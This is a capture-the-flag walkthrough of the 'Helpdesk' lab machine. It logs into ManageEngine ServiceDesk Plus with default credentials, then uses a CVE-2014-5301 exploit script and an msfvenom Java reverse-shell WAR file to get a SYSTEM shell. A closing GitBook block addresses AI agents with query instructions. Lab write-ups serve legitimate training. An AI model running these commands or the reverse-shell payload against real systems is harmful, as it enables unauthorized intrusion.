> For the complete documentation index, see [llms.txt](https://viperone.gitbook.io/pentest-everything/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/windows/helpdesk.md). # Helpdesk ``` sudo nmap 192.168.214.43 -p- -sS -sV 130 тип PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 microsoft-ds (workgroup: WORKGROUP) 3389/tcp open ms-wbt-server Microsoft Terminal Service 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 Service Info: Host: HELPDESK; OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2 ``` Port 8080 root page lands us on a login page for ManageEngine ServiceDesk plus. ![http://192.168.214.43:8080/](/files/-MWoPBJ5m11quK73zgGH) This is running version 7.6.0 as per the information available on screen. Looking up default credentials on Google shows we can try `administrator:admininistrator`. This proves successful and are able to login. ![](/files/-MWoPeluM_ZEf-IGFkVM) Research exploits for this particular version we come across **CVE-2014-5301**. **Description:** Directory traversal vulnerability in ServiceDesk Plus MSP v5 to v9.0 v9030; AssetExplorer v4 to v6.1; SupportCenter v5 to v7.9; IT360 v8 to v10.4. Looking for available exploits we come to[: https://github.com/PeterSufliarsky/exploits/blob/master/CVE-2014-5301.py](https://github.com/PeterSufliarsky/exploits/blob/master/CVE-2014-5301.py) As per the exploit instructions contained in the script generate a WAR file with `msfvenom`: ``` msfvenom -p java/shell_reverse_tcp LHOST=192.168.49.214 LPORT=445 -f war > /home/kali/Desktop/shell.war ``` Then execute with the following syntax: ``` # Script usage: ./CVE-2014-5301.py HOST PORT USERNAME PASSWORD WARFILE sudo python3 exploit.py 192.168.214.43 8080 administrator administrator shell.war ``` A shell should be received on a `netcat` listener running as SYSTEM. ![](/files/-MWohhwoIngiu2Nmg3gn) {% hint style="info" %} If you get a java heap error on the shell revert the machine and try again. {% endhint %} --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/windows/helpdesk.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.